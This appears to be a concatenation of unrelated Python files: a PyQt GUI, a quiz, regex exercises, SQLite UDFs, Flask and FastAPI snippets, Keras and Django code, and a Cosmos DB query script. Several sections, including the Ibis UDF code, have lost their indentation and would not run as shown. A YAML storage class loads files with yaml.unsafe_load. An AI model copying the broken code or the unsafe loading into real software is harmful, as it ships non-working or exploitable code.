            self.__download_manager.set_download_directory(dir)

    def mp3_checked_clicked(self):
        """Propagate the mp3-only checkbox state to the download manager."""
        self.__download_manager.mp3_mode_on(self.__ui.mp3_checkbox.isChecked());

    class UI(QWidget):
        """Container widget holding every control of the main window."""

        def __init__(self, parent):
            super().__init__(parent)
            self.layout = QVBoxLayout()
            # Fix the size constraint so the window sizes to its contents.
            self.layout.setSizeConstraint(QLayout.SetFixedSize);
            self.init_gui()
            self.setLayout(self.layout)
            self.layoutsize = self.size()

        def init_gui(self):
            """Build the three control rows, the video list, and the download button."""
            # Row 1: URL entry.
            self.h_box1 = QHBoxLayout()
            self.paste_label = QLabel('Paste the youtube url here: ')
            self.url_line_edit = QLineEdit()
            self.url_line_edit.setMaximumWidth(300);
            self.url_line_edit.setFixedWidth(310);
            self.h_box1.addWidget(self.paste_label)
            self.h_box1.addWidget(self.url_line_edit)
            self.layout.addLayout(self.h_box1)
            # Row 2: download directory chooser.
            self.h_box2 = QHBoxLayout()
            self.dir_line_edit = QLineEdit()
            self.browse_button = QPushButton('Browse')
            self.h_box2.addWidget(self.browse_button)
            self.h_box2.addWidget(self.dir_line_edit)
            self.layout.addLayout(self.h_box2)
            # Row 3: options and add/remove buttons.
            self.h_box3 = QHBoxLayout()
            self.parallel_checkbox = QCheckBox('Download in parallel')
            self.mp3_checkbox = QCheckBox('mp3 only')
            self.add_button = QPushButton('Add')
            self.remove_button = QPushButton('Remove')
            self.h_box3.addStretch(1);
            self.h_box3.addWidget(self.parallel_checkbox)
            self.h_box3.addWidget(self.mp3_checkbox)
            self.h_box3.addWidget(self.add_button)
            self.h_box3.addWidget(self.remove_button)
            self.layout.addLayout(self.h_box3)
            # Video list and download button (hidden until a video is added).
            self.download_button = QPushButton('Download')
            self.video_list = QListWidget(self)
            self.layout.addWidget(self.video_list)
            self.layout.addWidget(self.download_button)
|
import random
def ask(num, scores, question, answers):
    """Print question `num` with shuffled, lettered answers, read one letter
    from stdin, and add the chosen answer's weight into `scores`.

    Each answer is ``[text, character_key, weight]``, e.g.::

        ask(2, scores, "What is your favorite color?",
            [["Red", "patrick", 1.0], ["Blue", "squidward", 0.5],
             ["Yellow", "spongebob", 0.3]])

    (The previous example omitted the weight element, but the scoring line
    below reads ``answers[index][2]``, so a weight is required.)
    """
    random.shuffle(answers)
    # supports at most five answers per question
    letters = ["A", "B", "C", "D", "E"]
    print("{0}. {1}".format(num, question))
    for i in range(len(answers)):
        print("{0}. {1}".format(letters[i], answers[i][0]))
    answer = input().upper()
    index = -1
    for i in range(len(letters)):
        if answer == letters[i]:
            index = i
    if index == -1:
        # unrecognized letter: the question simply contributes no score
        print("No response recorded")
    else:
        # scores[character_key] += weight, creating the entry on first use
        scores[answers[index][1]] = scores.get(answers[index][1], 0) + answers[index][2]
# Quiz data: questions[i] pairs with answers[i]; each answer row is
# [text, character_key, weight].
questions = [
    "What is the best way to spend your day?",
    "What is your favorite snack?"
]
answers = [
    [  # What is the best way to spend your day?
        ["Cashing in at the casino", "krabs", 1.0],
        ["Hanging with the squad", "patrick", 0.3],
        ["Observing the fine arts", "squidward", 0.9],
        ["Working your favorite job", "spongebob", 1.0]
    ],
    [  # What is your favorite snack?
        ["Ketchup Packets", "krabs", 0.8],
        ["Sand", "patrick", 0.6],
        ["Chocolate Mousse", "squidward", 0.4],
        ["Krabby Patty", "spongebob", 1.0]
    ]
]
# Accumulate weighted scores per character across all questions.
scores = {}
for i in range(len(questions)):
    ask(i+1, scores, questions[i], answers[i])
# todo check scores
print(scores)
|
# Calculation for regex_sum_699035.txt (Py4E regex exercise):
# sum every run of digits found anywhere in the file.
import re

total = 0  # named `total` to avoid shadowing the builtin `sum`
with open('regex_sum_699035.txt') as ofile:  # with-block guarantees close
    for aline in ofile:
        for digits in re.findall('[0-9]+', aline.strip()):
            total = total + float(digits)
print(total)
#
# Demonstrate group extraction: grab only the href value from an anchor tag.
newline = '<p>Please click <a href="http://www.dr-chuck.com">here</a></p>'
print(re.findall('href="(.+)"', newline))
|
import functools
import inspect
import math
import regex as re
_SQLITE_UDF_REGISTRY = set()
_SQLITE_UDAF_REGISTRY = set()
def udf(f):
"""Create a SQLite scalar UDF from `f`
Parameters
----------
f
A callable object
Returns
-------
callable
A callable object that returns ``None`` if any of its inputs are
``None``.
"""
@functools.wraps(f)
def wrapper(*args):
if any(arg is None for arg in args):
return None
return f(*args)
_SQLITE_UDF_REGISTRY.add(wrapper)
return wrapper
def udaf(cls):
"""Register a UDAF class with any SQLite connection."""
_SQLITE_UDAF_REGISTRY.add(cls)
return cls
@udf
def _ibis_sqlite_reverse(string):
return string[::-1]
@udf
def _ibis_sqlite_string_ascii(string):
return ord(string[0])
@udf
def _ibis_sqlite_capitalize(string):
return string.capitalize()
@udf
def _ibis_sqlite_translate(string, from_string, to_string):
table = str.maketrans(from_string, to_string)
return string.translate(table)
@udf
def _ibis_sqlite_regex_search(string, regex):
    """Return whether `regex` exists in `string`.

    Note: `re` here is the third-party ``regex`` module aliased at import
    time, not the stdlib `re`.

    Parameters
    ----------
    string : str
    regex : str

    Returns
    -------
    found : bool
    """
    return re.search(regex, string) is not None


@udf
def _ibis_sqlite_regex_replace(string, pattern, replacement):
    """Replace occurrences of `pattern` in `string` with `replacement`.

    Parameters
    ----------
    string : str
    pattern : str
    replacement : str

    Returns
    -------
    result : str
    """
    return re.sub(pattern, replacement, string)


@udf
def _ibis_sqlite_regex_extract(string, pattern, index):
    """Extract match of regular expression `pattern` from `string` at `index`.

    Parameters
    ----------
    string : str
    pattern : str
    index : int

    Returns
    -------
    result : str or None
        None when there is no match, or when `index` exceeds the number of
        groups. Because ``lastindex`` is None for a pattern with no groups,
        ``(result.lastindex or -1)`` makes index 0 (the whole match) return
        None for group-less patterns as well.
    """
    result = re.search(pattern, string)
    if result is not None and 0 <= index <= (result.lastindex or -1):
        return result.group(index)
    return None
@udf
def _ibis_sqlite_exp(arg):
    """Exponentiate `arg`.

    Parameters
    ----------
    arg : number
        Number to raise to `e`.

    Returns
    -------
    result : Optional[number]
        None if the input is None (handled by the `udf` wrapper).
    """
    return math.exp(arg)
@udf
def _ibis_sqlite_log(arg, base):
    """Logarithm of `arg` in `base`; NULL instead of a math error.

    math.log raises ValueError for nonpositive inputs, and base 1 triggers a
    ZeroDivisionError — return None (SQL NULL) for all of those. The old
    ``arg < 0`` check let arg == 0 raise inside the SQLite engine.
    """
    if arg <= 0 or base <= 0 or base == 1:
        return None
    return math.log(arg, base)


@udf
def _ibis_sqlite_ln(arg):
    """Natural logarithm of `arg`; NULL for nonpositive input."""
    if arg <= 0:
        return None
    return math.log(arg)
@udf
def _ibis_sqlite_log2(arg):
    # Delegates to the base-`base` log UDF with base 2.
    return _ibis_sqlite_log(arg, 2)


@udf
def _ibis_sqlite_log10(arg):
    # Delegates to the base-`base` log UDF with base 10.
    return _ibis_sqlite_log(arg, 10)


@udf
def _ibis_sqlite_floor(arg):
    """Largest integer <= `arg`."""
    return math.floor(arg)


@udf
def _ibis_sqlite_ceil(arg):
    """Smallest integer >= `arg`."""
    return math.ceil(arg)


@udf
def _ibis_sqlite_sign(arg):
    """Sign of `arg`: int 0 for zero, otherwise float +/-1.0 via copysign."""
    if not arg:
        return 0
    return math.copysign(1, arg)


@udf
def _ibis_sqlite_floordiv(left, right):
    # NOTE(review): right == 0 raises ZeroDivisionError, which surfaces as a
    # SQLite error rather than NULL — confirm that is the intended behavior.
    return left // right


@udf
def _ibis_sqlite_mod(left, right):
    # NOTE(review): same ZeroDivisionError caveat as floordiv above.
    return left % right
@udf
def _ibis_sqlite_power(arg, power):
    """Raise `arg` to the `power` power.

    Parameters
    ----------
    arg : number
        Number to raise to `power`.
    power : number
        Number to raise `arg` to.

    Returns
    -------
    result : Optional[number]
        None if either argument is None or we're trying to take a fractional
        power of a negative number.
    """
    # float(power): SQLite may pass an int here, and int.is_integer() only
    # exists on Python >= 3.12 — the unwrapped call raised AttributeError.
    if arg < 0.0 and not float(power).is_integer():
        return None
    return arg**power
@udf
def _ibis_sqlite_sqrt(arg):
    """Square root of `arg`.

    Parameters
    ----------
    arg : Optional[number]
        Number to take the square root of

    Returns
    -------
    result : Optional[number]
        None if `arg` is None or less than 0, otherwise the square root.
        (The explicit None check is redundant with the `udf` wrapper but
        harmless.)
    """
    return None if arg is None or arg < 0.0 else math.sqrt(arg)
class _ibis_sqlite_var:
def __init__(self, offset):
self.mean = 0.0
self.sum_of_squares_of_differences = 0.0
self.count = 0
self.offset = offset
def step(self, value):
if value is not None:
self.count += 1
delta = value - self.mean
self.mean += delta / self.count
self.sum_of_squares_of_differences += delta * (value - self.mean)
def finalize(self):
count = self.count
if count:
return self.sum_of_squares_of_differences / (count - self.offset)
return None
@udaf
class _ibis_sqlite_var_pop(_ibis_sqlite_var):
    """Population variance: divides by N (offset 0)."""
    def __init__(self):
        super().__init__(0)


@udaf
class _ibis_sqlite_var_samp(_ibis_sqlite_var):
    """Sample variance: divides by N - 1 (offset 1)."""
    def __init__(self):
        super().__init__(1)
def _number_of_arguments(callable):
signature = inspect.signature(callable)
parameters = signature.parameters.values()
kinds = [param.kind for param in parameters]
valid_kinds = (
inspect.Parameter.POSITIONAL_OR_KEYWORD,
inspect.Parameter.POSITIONAL_ONLY,
)
if any(kind not in valid_kinds for kind in kinds) or any(
param.default is not inspect.Parameter.empty for param in parameters
):
raise TypeError(
'Only positional arguments without defaults are supported in Ibis '
'SQLite function registration'
)
return len(parameters)
def _register_function(func, con):
    """Register a Python callable with a SQLite connection `con`.

    Parameters
    ----------
    func : callable
    con : sqlalchemy.Connection
    """
    nargs = _number_of_arguments(func)
    # con.connection.connection unwraps SQLAlchemy down to the raw DBAPI
    # (sqlite3) connection, which owns create_function.
    con.connection.connection.create_function(func.__name__, nargs, func)


def _register_aggregate(agg, con):
    """Register a Python class that performs aggregation in SQLite.

    Parameters
    ----------
    agg : type
    con : sqlalchemy.Connection
    """
    nargs = _number_of_arguments(agg.step) - 1 # because self
    con.connection.connection.create_aggregate(agg.__name__, nargs, agg)


def register_all(con):
    """Register all udf and udaf with the connection.

    All udf and udaf are defined in this file with the `udf` and `udaf`
    decorators.

    Parameters
    ----------
    con : sqlalchemy.Connection
    """
    for func in _SQLITE_UDF_REGISTRY:
        con.run_callable(functools.partial(_register_function, func))
    for agg in _SQLITE_UDAF_REGISTRY:
        con.run_callable(functools.partial(_register_aggregate, agg))
|
#!/usr/bin/env python3
from meerkat_api import app

# Development entry point: DEBUG flag comes from the Flask app config.
app.run(debug=app.config['DEBUG'], host="0.0.0.0")
# Replace above with following line for production
# app.run(host='0.0.0.0')
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
Topic: 字符串搜索和替换
Desc :
"""
import re
from calendar import month_abbr
def change_date(m):
    """re.sub callback: turn an ``mm/dd/yyyy`` match into ``dd Mon yyyy``."""
    month, day, year = m.group(1), m.group(2), m.group(3)
    return '{} {} {}'.format(day, month_abbr[int(month)], year)
def search_replace():
    """Demonstrate string and regex search/replace techniques."""
    text = 'yeah, but no, but yeah, but no, but yeah'
    print(text.replace('yeah', 'yep'))
    # For complex patterns, use re.sub()
    text = 'Today is 11/27/2012. PyCon starts 3/13/2013.'
    print(re.sub(r'(\d+)/(\d+)/(\d+)', r'\3-\1-\2', text))
    print(re.sub(r'(?P<month>\d+)/(?P<day>\d+)/(?P<year>\d+)', r'\g<year>-\g<month>-\g<day>', text))
    # Pre-compile the pattern for reuse
    datepat = re.compile(r'(\d+)/(\d+)/(\d+)')
    print(datepat.sub(r'\3-\1-\2', text))
    # More complex replacement via a callback function
    print(datepat.sub(change_date, text))
    # subn() also returns the number of replacements made
    newtext, n = datepat.subn(r'\3-\1-\2', text)
    print(newtext, n)


if __name__ == '__main__':
    search_replace()
|
import os
import yaml
CONFKEY_STORAGE_FILE = "storage_file"
CONFKEY_STORAGE_MAX_AGE_SECS = "storage_max_age_secs" # former: "restore_last_max_diff"
class StorageException(Exception):
    """Raised when the backing storage file cannot be read or written."""
    pass
class Storage:
    """Key/value persistence backed by a YAML file.

    Callers must invoke load() (or empty()) before get/set/delete, since
    `_data` starts as None and those methods would raise AttributeError.
    """

    def __init__(self):
        self._file = None   # path to the YAML file; None disables persistence
        self._data = None   # dict once load()/empty() has run

    def set_file(self, file):
        """Set the YAML file path used by load()/save()."""
        self._file = file

    def empty(self):
        """Initialize with an empty data set without touching the file."""
        self._data = {}

    @property
    def initilized(self):
        # (sic) spelling kept — part of the public API.
        return self._data is not None

    def load(self):
        """Load data from the file; missing file/path yields an empty store."""
        try:
            if self._file is not None and os.path.isfile(self._file):
                with open(self._file, 'r') as stream:
                    # SECURITY: unsafe_load can construct arbitrary Python
                    # objects — only use with trusted, locally-written files.
                    self._data = yaml.unsafe_load(stream)
            else:
                self.empty()
        except (PermissionError, ValueError) as ex:
            raise StorageException(ex)

    def save(self):
        """Write the current data to the file (no-op when no file is set)."""
        if self._file is not None:
            try:
                # backup and write to a new file to avoid flashing the same sdcards bits again and again?
                with open(self._file, 'w') as stream:
                    yaml.dump(self._data, stream, default_flow_style=False)
            except PermissionError as ex:
                raise StorageException(ex)

    def get(self, key, default=None):
        # Requires load()/empty() first; see class docstring.
        return self._data.get(key, default)

    def set(self, key, value):
        self._data[key] = value

    def delete(self, key):
        # Missing keys are ignored.
        self._data.pop(key, None)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# this is a virtual module that is entirely implemented server side
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: win_template
version_added: "1.9.2"
short_description: Template a file out to a remote server
options:
backup:
description:
- Determine whether a backup should be created.
- When set to C(yes), create a backup file including the timestamp information
so you can get the original file back if you somehow clobbered it incorrectly.
type: bool
default: no
version_added: '2.8'
newline_sequence:
default: '\r\n'
force:
version_added: '2.4'
notes:
- Beware fetching files from windows machines when creating templates because certain tools, such as Powershell ISE,
and regedit's export facility add a Byte Order Mark as the first character of the file, which can cause tracebacks.
- You can use the M(win_copy) module with the C(content:) option if you prefer the template inline, as part of the
playbook.
- For Linux you can use M(template) which uses '\\n' as C(newline_sequence) by default.
seealso:
- module: win_copy
- module: copy
- module: template
author:
- Jon Hawkesworth (@jhawkesworth)
extends_documentation_fragment:
- template_common
'''
EXAMPLES = r'''
- name: Create a file from a Jinja2 template
win_template:
src: /mytemplates/file.conf.j2
dest: C:\Temp\file.conf
- name: Create a Unix-style file from a Jinja2 template
win_template:
src: unix/config.conf.j2
dest: C:\share\unix\config.conf
newline_sequence: '\n'
backup: yes
'''
RETURN = r'''
backup_file:
description: Name of the backup file that was created.
returned: if backup=yes
type: str
sample: C:\Path\To\File.txt.11540.20150212-220915.bak
'''
|
# Path to the helper shell script invoked by dump_dicom below.
script_location = '/fastapi/dump_dicom.sh'
from fastapi import Depends, APIRouter, HTTPException
from pydantic import BaseModel
from typing import List
import datetime
from starlette.responses import Response, FileResponse, PlainTextResponse
router = APIRouter()
from .auth import logged_in_user, User
from ..util import Database
import asyncio
import logging
@router.get("/{file_id}")
async def dump_dicom(file_id: int, db: Database = Depends()):
    """Return a plain-text dump of the DICOM file identified by `file_id`,
    produced by an external shell script (`script_location`)."""
    # get the filename from the database
    logging.debug(f"Generating dump for {file_id}")
    query = """
        select root_path || '/' || rel_path as file
        from
          file_location
          natural join file_storage_root
        where file_id = $1
        """
    records = await db.fetch(query, [file_id])
    try:
        file = records[0]['file']
        logging.debug(file)
    except IndexError:
        # no row for this id -> 404
        raise HTTPException(detail=f"file_id {file_id} does not exist", status_code=404)
    try:
        proc = await asyncio.create_subprocess_exec(
            script_location, file, stdout=asyncio.subprocess.PIPE)
    except Exception as e:
        logging.error("Failed to create subprocess")
        logging.error(e)
        raise e
    logging.debug("process created, about to wait on it")
    # await proc.wait() # wait for it to end
    # logging.debug("process ended, getting data")
    # Reading to EOF also implicitly waits for the process to finish writing.
    data = await proc.stdout.read() # read entire output
    logging.debug("data got, returning it")
    try:
        new_data = data.decode()
    except UnicodeDecodeError:
        # Guess at the encoding (chardet imported lazily — third-party dep)
        import chardet
        encoding = chardet.detect(data)['encoding']
        new_data = data.decode(encoding)
    return PlainTextResponse(new_data)
|
from tensorflow.keras.layers import Activation, Reshape, Lambda, Multiply, dot, add
from tensorflow.keras.layers import Conv1D, Conv2D, Conv3D
from tensorflow.keras.layers import MaxPool1D
from tensorflow.keras import backend as K
def non_local_block(ip, out_channels, height, width, name, intermediate_dim=None, compression=2,
                    mode='embedded', add_residual=True):
    """
    Adds a Non-Local block for self attention to the input tensor.
    Input tensor can be of rank 3 (temporal), 4 (spatial) or 5 (spatio-temporal).

    Arguments:
        ip: input tensor
        out_channels: channel count of `ip`; used for the rank-4 path and to
            size the default intermediate dimension.
        height, width: spatial dims of `ip` (rank-4 path and `dot` scaling).
        name: base name for the convolution layers created in this block.
        intermediate_dim: The dimension of the intermediate representation. Can be
            `None` or a positive integer greater than 0. If `None`, computes the
            intermediate dimension as half of the input channel dimension.
        compression: None or positive integer. Compresses the intermediate
            representation during the dot products to reduce memory consumption.
            Default is set to 2, which states halve the time/space/spatio-time
            dimension for the intermediate step. Set to 1 to prevent computation
            compression. None or 1 causes no reduction.
        mode: Mode of operation. Can be one of `embedded`, `gaussian`, `dot` or
            `concatenate`.
        add_residual: Boolean value to decide if the residual connection should be
            added or not. Default is True for ResNets, and False for Self Attention.

    Returns:
        a tensor of same shape as input
    """
    channel_dim = 1 if K.image_data_format() == 'channels_first' else -1
    ip_shape = K.shape(ip)

    if mode not in ['gaussian', 'embedded', 'dot', 'concatenate']:
        raise ValueError('`mode` must be one of `gaussian`, `embedded`, `dot` or `concatenate`')

    if compression is None:
        compression = 1  # None means "no compression"

    dim1, dim2, dim3 = None, None, None

    # check rank and calculate the input shape
    if ip_shape.shape[0] == 3:  # temporal / time series data
        rank = 3
        batchsize, dim1, channels = ip.get_shape().as_list()
    elif ip_shape.shape[0] == 4:  # spatial / image data
        rank = 4
        if channel_dim == 1:
            batchsize, channels, dim1, dim2 = ip.get_shape().as_list()
        else:
            batchsize, dim1, dim2, channels = ip.get_shape().as_list()
        # the static shape may be unknown here; trust the caller-supplied dims
        dim1 = height
        dim2 = width
        channels = out_channels
    elif ip_shape.shape[0] == 5:  # spatio-temporal / Video or Voxel data
        rank = 5
        if channel_dim == 1:
            batchsize, channels, dim1, dim2, dim3 = ip.get_shape().as_list()
        else:
            batchsize, dim1, dim2, dim3, channels = ip.get_shape().as_list()
    else:
        raise ValueError('Input dimension has to be either 3 (temporal), 4 (spatial) or 5 (spatio-temporal)')

    # verify correct intermediate dimension specified
    if intermediate_dim is None:
        intermediate_dim = out_channels // 2
        if intermediate_dim < 1:
            intermediate_dim = 1
    else:
        intermediate_dim = int(intermediate_dim)
        if intermediate_dim < 1:
            raise ValueError('`intermediate_dim` must be either `None` or positive integer greater than 1.')

    if mode == 'gaussian':  # Gaussian instantiation
        x1 = Reshape((-1, channels))(ip)  # xi
        x2 = Reshape((-1, channels))(ip)  # xj
        f = dot([x1, x2], axes=2)
        f = Activation('softmax')(f)
    elif mode == 'dot':  # Dot instantiation
        # theta path
        theta = _convND(ip, rank, intermediate_dim, name=name+'_dot1')
        theta = Reshape((-1, intermediate_dim))(theta)
        # theta = tf.transpose(theta, [0, 2, 1])
        # phi path
        phi = _convND(ip, rank, intermediate_dim, name=name+'_dot2')
        phi = Reshape((-1, intermediate_dim))(phi)
        f = dot([theta, phi], axes=[2,2])
        f = Lambda(lambda z: (1. / K.cast(height*width, 'float32')) * z)(f)
    elif mode == 'concatenate':  # Concatenation instantiation
        raise NotImplementedError('Concatenate model has not been implemented yet')
    else:  # Embedded Gaussian instantiation
        # BUGFIX: _convND requires a `name` argument; the two calls below
        # previously omitted it and raised TypeError whenever the default
        # 'embedded' mode was used.
        # theta path
        theta = _convND(ip, rank, intermediate_dim, name=name+'_embed_theta')
        theta = Reshape((-1, intermediate_dim))(theta)
        # phi path
        phi = _convND(ip, rank, intermediate_dim, name=name+'_embed_phi')
        phi = Reshape((-1, intermediate_dim))(phi)

        if compression > 1:
            # shielded computation
            phi = MaxPool1D(compression)(phi)

        f = dot([theta, phi], axes=2)
        f = Activation('softmax')(f)

    # g path
    g = _convND(ip, rank, intermediate_dim, name=name+'_g')
    g = Reshape((-1, intermediate_dim))(g)

    if compression > 1 and mode == 'embedded':
        # shielded computation
        g = MaxPool1D(compression)(g)

    # compute output path
    y = dot([f, g], axes=[2, 1])

    # reshape to input tensor format
    if rank == 3:
        y = Reshape((dim1, intermediate_dim))(y)
    elif rank == 4:
        if channel_dim == -1:
            y = Reshape((dim1, dim2, intermediate_dim))(y)
        else:
            y = Reshape((intermediate_dim, dim1, dim2))(y)
    else:
        if channel_dim == -1:
            y = Reshape((dim1, dim2, dim3, intermediate_dim))(y)
        else:
            y = Reshape((intermediate_dim, dim1, dim2, dim3))(y)

    # project filters back to the input channel count
    y = _convND(y, rank, channels, name=name+'_y')

    # residual connection
    if add_residual:
        y = add([ip, y])

    return y
def _convND(ip, rank, channels, name=None):
    """Apply a 1x1(x1) convolution with `channels` filters to `ip`.

    `name` now defaults to None (Keras then auto-generates a unique layer
    name), so existing three-argument callers no longer raise TypeError.
    The name is also forwarded to Conv1D/Conv3D, which previously ignored it.
    """
    assert rank in [3, 4, 5], "Rank of input must be 3, 4 or 5"
    if rank == 3:
        x = Conv1D(channels, 1, padding='same', use_bias=False, kernel_initializer='he_normal', name=name)(ip)
    elif rank == 4:
        x = Conv2D(channels, (1, 1), padding='same', use_bias=False, kernel_initializer='he_normal', name=name)(ip)
    else:
        x = Conv3D(channels, (1, 1, 1), padding='same', use_bias=False, kernel_initializer='he_normal', name=name)(ip)
    return x
|
import requests
import json
from seoulai_gym.envs.market.config import BASE_URL
class BaseAPI():
    """Minimal HTTP client for the market API rooted at BASE_URL."""

    def __init__(
            self,
    ) -> None:
        """Initialize BaseAPI.

        Args:
            None

        Returns:
            None
        """

    def api_post(
            self,
            cmd,
            data,
    ):
        # POST `data` as a JSON body to BASE_URL + cmd.
        # Returns the parsed JSON response on HTTP 200, otherwise None
        # (non-200 responses are silently discarded).
        url = BASE_URL + cmd
        headers = {"content-type": "application/json"}
        r = requests.post(url,
                          headers=headers,
                          data=json.dumps(data))
        if r.status_code == 200:
            return r.json()
        return None

    def api_get(
            self,
            cmd,
            data,
    ):
        # GET with a hand-built query string from `data`.
        # NOTE(review): assumes every value is already a str and needs no
        # URL escaping — urllib.parse.urlencode would be safer; confirm
        # the callers only pass simple string values.
        url = BASE_URL + cmd
        conditions = [key+"="+value for key, value in data.items()]
        query = "?" + "&".join(conditions)
        url += query
        r = requests.get(url)
        if r.status_code == 200:
            return r.json()
        return None
|
# Generated by Django 3.1.13 on 2021-10-28 21:17
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: creates the Game model. Migrations are
    # historical records — do not edit the operations after deployment.

    dependencies = [
        ("interactive", "0018_auto_20210909_2046"),
    ]

    operations = [
        migrations.CreateModel(
            name="Game",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("index", models.IntegerField(help_text="Bruk helst 10, 20, 30 osv.")),
                ("title", models.TextField()),
                ("url", models.TextField()),
                (
                    "picture",
                    models.ImageField(
                        blank=True,
                        help_text="Bruk samme størrelse på alle bilder, helst 770x300 px",
                        null=True,
                        upload_to="uploads/game_pictures",
                        verbose_name="Bilde",
                    ),
                ),
            ],
            options={
                "ordering": ["index"],
            },
        ),
    ]
|
"""
A script for executing a query and store the results.
The environment variables COSMOS_ENDPOINT and COSMOS_KEY need to be set.
"""
import json
import os
import time
from datetime import datetime
import humanfriendly
from azure.cosmos.cosmos_client import CosmosClient
#%% Common queries
# This query is used when preparing tfrecords for object detector training
# We do not want to get the whole seq obj where at least one image has bbox because some images in that sequence
# will not be bbox labeled so will be confusing
query_bbox = '''
SELECT im.bbox, im.file, seq.dataset, seq.location
FROM sequences seq JOIN im IN seq.images
WHERE ARRAY_LENGTH(im.bbox) >= 0
'''

# For public datasets to be converted to the CCT format, we get the whole seq object because
# sequence level attributes need to be included too. megadb/converters/megadb_to_cct.py handles
# the case of bbox-only JSONs with the flag exclude_species_class
query_lila = '''
SELECT seq
FROM sequences seq
WHERE (SELECT VALUE COUNT(im) FROM im IN seq.images WHERE ARRAY_LENGTH(im.bbox) >= 0) > 0
'''

query_empty = '''
SELECT im.file, seq.dataset, seq.location
FROM sequences seq JOIN im IN seq.images
WHERE ARRAY_LENGTH(im.class) = 1 AND ARRAY_CONTAINS(im.class, "empty")
OR ARRAY_LENGTH(seq.class) = 1 AND ARRAY_CONTAINS(seq.class, "empty")
'''

#%% Parameters
query = query_lila

output_dir = '/home/marmot/camtrap/data/wcs_boxes'
assert os.path.isdir(output_dir), 'Please create the output directory first'

output_indent = None  # None if no indentation needed in the output, or int

partition_key='wcs'  # use None if querying across all partitions

# flush results to a part file every `save_every` items to bound memory use
save_every = 20000
assert save_every > 0

# use False for when the results file will be too big to store in memory or in a single JSON.
consolidate_results = True

#%% Script
time_stamp = datetime.utcnow().strftime('%Y%m%d%H%M%S')

# initialize Cosmos DB client (credentials come from the environment)
url = os.environ['COSMOS_ENDPOINT']
key = os.environ['COSMOS_KEY']
client = CosmosClient(url, credential=key)
database = client.get_database_client('camera-trap')
container_sequences = database.get_container_client('sequences')

# execute the query
start_time = time.time()

if partition_key:
    result_iterable = container_sequences.query_items(query=query,
                                                      partition_key=partition_key)
else:
    result_iterable = container_sequences.query_items(query=query,
                                                      enable_cross_partition_query=True)

# loop through and save the results
results = []
item_count = 0
part_count = 0
part_paths = []

for item in result_iterable:
    results.append(item['seq'])  # MODIFY HERE depending on the query
    item_count += 1
    if item_count % save_every == 0:
        # persist this batch and reset the in-memory buffer
        part_count += 1
        print('Saving results part {}. Example item:'.format(part_count))
        print(results[-1])
        part_path = os.path.join(output_dir, '{}_{}.json'.format(time_stamp, item_count))
        with open(part_path, 'w') as f:
            json.dump(results, f)
        results = []  # clear the results list
        part_paths.append(part_path)

elapsed = time.time() - start_time
print('Getting all the results used {}'.format(humanfriendly.format_timespan(elapsed)))

if consolidate_results:
    print('Consolidating the parts...')
    all_results = results  # the unsaved entries
    for part_path in part_paths:
        with open(part_path) as f:
            part_items = json.load(f)
        all_results.extend(part_items)
    print('Number of items from iterable is {}; number of items in consolidated results is {}'.format(item_count,
                                                                                                      len(all_results)))
    out_path = os.path.join(output_dir, '{}_all.json'.format(time_stamp))
    with open(out_path, 'w') as f:
        json.dump(all_results, f, indent=output_indent)
    print('Consolidated results saved to {}'.format(out_path))

    print('Removing partitions...')
    for part_path in part_paths:
        os.remove(part_path)

print('Done!')
|
# Generated by Django 3.0.4 on 2020-03-10 11:06
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated migration: drops the obsolete Settings model.

    dependencies = [
        ("bokstaever", "0032_pagemodel_show_menu"),
    ]

    operations = [
        migrations.DeleteModel(name="Settings",),
    ]
|
import glob
import numpy as np
import math
from process import *
# plt, MultiCursor and set_plot_title come from `from process import *` —
# presumably matplotlib re-exports; verify against process.py.
files = sorted(glob.glob("../../data/raw/trunk/60gs/3rd_eval/*.txt"))
path = files[3]

data = np.loadtxt(path, skiprows=6)
time = data[:, 0]
torque = data[:, 1]
velocity = data[:, 4]
# fold the measured angle into anatomical degrees relative to the 60° setting
angle = abs(data[:, 3])
angle = abs(angle - 60)

# Gravity torque vars
mass = 48.90154            # subject mass (kg) — TODO confirm units/source
g = 9.81
upper_body_length = 0.73   # m
percent = 0.5              # fraction of upper-body length to the mass center
distance = upper_body_length * percent
# shift to the gravity-model reference frame, then convert to radians
angle_c = angle + 10
angle_c = 90 + angle_c
angle_c = angle_c * (math.pi / 180)

a = np.zeros(torque.shape)
Tg = mass * g * distance * np.sin(angle_c)
Tc = np.empty(shape=torque.shape, dtype='object')
# for i in range(0, len(torque)):
#     if velocity[i] > 0:
#         Tc[i] = torque[i] Tg[i]
#     elif velocity[i] < 0:
#         Tc[i] = torque[i] - Tg[i]
#     elif velocity[i] == 0:
#         Tc[i] = torque[i]
Tc = torque - Tg

# Plot
fig1 = plt.figure(figsize=(18, 9))
ax1 = fig1.add_subplot(2, 1, 1)
ax2 = fig1.add_subplot(2, 1, 2)
# Add a multicursor to all subplotsg
multi = MultiCursor(fig1.canvas, (ax1, ax2), color="k", linewidth=1)
multi
ax1.plot(time, torque, color="tab:blue", label="Torque (Nm)")
ax1.plot(time, velocity, color="tab:orange", label="Velocity (°/s)")
# NOTE(review): this line plots Tg (gravity torque) but labels it
# "Torque corrected"; Tc is computed above yet never plotted — confirm
# which series was intended.
ax1.plot(time, Tg, color="tab:red", label="Torque corrected")
ax2.plot(time, angle, color="tab:green", label="Anatomical position (°)")
ax1.legend(loc="upper right")
ax2.legend(loc="upper right")
# Add a horizontal line at torque and velocity = 0
ax1.axhline(y=0, color="tab:blue", linestyle="dotted")
# Add horizontal lines at the selected isokinetic velocity
ax1.axhline(y=60, color="tab:orange", linestyle="dotted")
ax1.axhline(y=-60, color="tab:orange", linestyle="dotted")
title = set_plot_title(path)
ax1.set_title(title)
plt.tight_layout()
plt.show()
|
from pypy.rlib.rarithmetic import intmask
class OPERAND(object):
    """Base class for all x86 instruction operands."""
    _attrs_ = []  # RPython: declare no instance attributes on the base

    def __repr__(self):
        return '<%s %s>' % (self.__class__.__name__, self.assembler())


class REG(OPERAND):
    """A 32-bit general-purpose register; subclasses set `op` (0-7)."""
    width = 4

    def __repr__(self):
